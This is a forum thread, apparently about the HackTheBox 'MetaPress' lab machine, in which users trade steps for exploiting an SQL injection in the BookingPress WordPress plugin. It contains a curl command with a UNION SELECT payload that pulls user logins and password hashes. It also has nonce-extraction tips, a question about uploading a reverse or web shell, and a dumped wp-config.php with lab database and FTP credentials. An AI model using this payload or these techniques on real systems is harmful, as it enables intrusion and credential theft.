October 29, 2022 at 8:00 PM
How can I upload a reverse shell/web shell?
October 29, 2022 at 8:01 PM (October 29, 2022, 07:58 PM)vexxxi Wrote:(October 29, 2022, 07:55 PM)elliotal53 Wrote:(October 29, 2022, 07:50 PM)11231123 Wrote:(October 29, 2022, 07:40 PM)elliotal53 Wrote:(October 29, 2022, 07:36 PM)11231123 Wrote: Works for me: how to get nonce value ? October 29, 2022 at 8:02 PM ah ok sorry: Visit the just created page as an unauthenticated user and extract the "nonce" (view source -> search for "action:'bookingpress_front_get_category_services'") October 29, 2022 at 8:04 PM (October 29, 2022, 08:01 PM)elliotal53 Wrote:(October 29, 2022, 07:58 PM)vexxxi Wrote:(October 29, 2022, 07:55 PM)elliotal53 Wrote:(October 29, 2022, 07:50 PM)11231123 Wrote:(October 29, 2022, 07:40 PM)elliotal53 Wrote: how did you get it to work? mind explaining a bit more ? You should just read, before asking friend, in the link https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357 it tells you what to do step by step. But if you find it difficult just right click inspect and look for the word nonce there you will see a number. If you don't know where to inspect go to the agenda form. October 29, 2022 at 8:05 PM Btw, after logging in, this works:  October 29, 2022 at 8:23 PM (October 29, 2022, 08:16 PM)elliotal53 Wrote:(October 29, 2022, 08:04 PM)chamo20 Wrote:(October 29, 2022, 08:01 PM)elliotal53 Wrote:(October 29, 2022, 07:58 PM)vexxxi Wrote:(October 29, 2022, 07:55 PM)elliotal53 Wrote: {"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."} It will be different for everyone... lol October 29, 2022 at 8:23 PM (October 29, 2022, 08:16 PM)elliotal53 Wrote:(October 29, 2022, 08:04 PM)chamo20 Wrote:(October 29, 2022, 08:01 PM)elliotal53 Wrote:(October 29, 2022, 07:58 PM)vexxxi Wrote:(October 29, 2022, 07:55 PM)elliotal53 Wrote: {"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."} curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \ --data 'action=bookingpress_front_get_category_services&_wpnonce=b8894b6e08&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -' still returns error October 29, 2022 at 8:35 PM (October 29, 2022, 08:23 PM)elliotal53 Wrote:(October 29, 2022, 08:16 PM)elliotal53 Wrote:(October 29, 2022, 08:04 PM)chamo20 Wrote:(October 29, 2022, 08:01 PM)elliotal53 Wrote:(October 29, 2022, 07:58 PM)vexxxi Wrote: you have to use the proper nonce value remove the backslash and new line October 29, 2022 at 8:36 PM [php]<?php /** The name of the database for WordPress */ define( 'DB_NAME', 'blog' ); /** MySQL database username */ define( 'DB_USER', 'blog' ); /** MySQL database password */ define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); define( 'FS_METHOD', 'ftpext' ); define( 'FTP_USER', 'metapress.htb' ); define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' ); define( 'FTP_HOST', 'ftp.metapress.htb' ); define( 'FTP_BASE', 'blog/' ); define( 'FTP_SSL', false ); /**#@+ * Authentication Unique Keys and Salts. * @since 2.6.0 */ define( 'AUTH_KEY', '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' ); define( 'SECURE_AUTH_KEY', 'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' ); define( 'LOGGED_IN_KEY', 'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' ); define( 'NONCE_KEY', 'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' ); define( 'AUTH_SALT', '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' ); define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' ); define( 'LOGGED_IN_SALT', '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' ); define( 'NONCE_SALT', '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' ); /** * WordPress Database Table prefix. */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; [/php] October 29, 2022 at 8:37 PM (October 29, 2022, 08:35 PM)a5bestG00s3 Wrote:(October 29, 2022, 08:23 PM)elliotal53 Wrote:(October 29, 2022, 08:16 PM)elliotal53 Wrote:(October 29, 2022, 08:04 PM)chamo20 Wrote:(October 29, 2022, 08:01 PM)elliotal53 Wrote: how to get nonce value ? curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=b8894b6e08&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -' {"variant":"error","title":"Error","msg":"Sorry, Your request can not process due to security reason."} |
